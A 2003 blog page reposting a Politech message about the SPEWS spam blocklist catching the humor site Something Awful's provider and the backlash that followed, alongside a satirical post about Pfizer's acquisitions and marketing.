Like Politech? Make a donation here:
Declan McCullagh's photographs are at

posted by Gary Williams at 1:43 PM | link |

SPEWS And Something Awful -- A Humor Site's Take Of Spamblock Woe

From Declan McCullagh's Politech

Date: Sunday, August 10, 2003 11:42:11 AM
Subject: FC: First Spamcop, now SPEWS -- a humor site's tale of spamblock woe

---------- Forwarded message ----------
Date: Fri, 8 Aug 2003 17:25:42 -0400
From: Ben <>
Subject: First spamcop, now SPEWS.

I thought you might already know about this since SA is an extremely popular site, as is which has been linking to the SA site as this all unfolds. But since I haven't seen it on the list, I thought I'd make sure...

.....the short version is that SA is a popular humor site who's provider has been blacklisted by in a manner even more annoying than Spamcop's typical methods. Well, maybe annoying is an understatement. Not only did SPEWS blacklist them so that customers would be angered at the loss of legitimate correspondence and flood Cogent with complaints, the only recourse for hosted sites like SA was to post to a Newsgroup frequented more by SPEWS supporters than SPEWS itself. The result was that when SA's attempts to be removed were turned down, the writers explainedthe situation to the site's fans so that (as in politech's case) they would be able to complain, and hopefully the issue would then be resolved. fans did complain, some angry and insulting I'm sure, and some well reasoned and calm. That's probably how it was in matter between your list and Spamcop, only this time it had to happen on a public newsgroup. The result was that SPEWS supporters felt they were under attack, and in what must be a monument to hypocrisy, some of them responded by signing SA's staff up to more than 100 spam mailing lists.......and it doesn't seem to be over yet.


POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech:
This message is archived at
Like Politech? Make a donation here:
Declan McCullagh's photographs are at

posted by Gary Williams at 1:36 PM | link |

via Pharma Watch

OK, How About A Little Bit Of Everything For Everybody?

And as Pfizer becomes second only to General Electric in corporate mega goliath-ness, I look forward to their CEO writing a book along the line of GE’s Jack Welsh’s “Who Stole My Cheese”. I presume Hank McKinnell (The Incredible Hank?) will be calling it something like “Buy Everything, Buy Everybody”. That seems to be their strategy. They can’t invent decent drugs, so they buy up the companies that can. They buy up the politicians to push through the legislation to get their drugs approved (and keep competitors off the market). They buy up all the airtime and adspace and buy up all the celebs to promote their wares. And of course, they buy the clinicians and researchers with lots of lovely research grants, consultancies and good old wining and dining.

Which reminds me, I was talking to a Pfizer rep recently and made a joke about their bulging corporate war chest. Having bought up other companies like Pharmacia, Parke Davis and Upjohn, they would now be able to market a mega pill that contained all their blockbusters in one tablet. A bit of a statin (Lipitor), a bit of an antibiotic (Zithromax), bit of a COX-2 (Celebrex), bit of an antidepressant (Zoloft), some ACE inhibitor and a bit of an anti-ulcer drug (???can’t be bothered to find out if they have one). Bob’s your uncle. The health service could save billions by having nurse practitioners dispense these to allcomers. Tired all the time? Take this. Next! Cough? Here you are. Next! Heartburn again? Blood pressure up? Next ….

Strangely enough, the rep said we could expect an anouncement along those lines in the very near future. I wonder what they’ll call it?

posted by Gary Williams at 1:31 AM | link |

Support Bloggers' Rights!
Support Bloggers' Rights!


Free JavaScripts provided by
The JavaScript Source

Free Guestmap from Free Guestmap from

The WeatherPixie

Search WWW TFS Reluctant


Who What Where When
homepage, email
and store
Defunct Blogs
News, science
and stuff
Politics, government
and stuff
Web and
Webhack stuff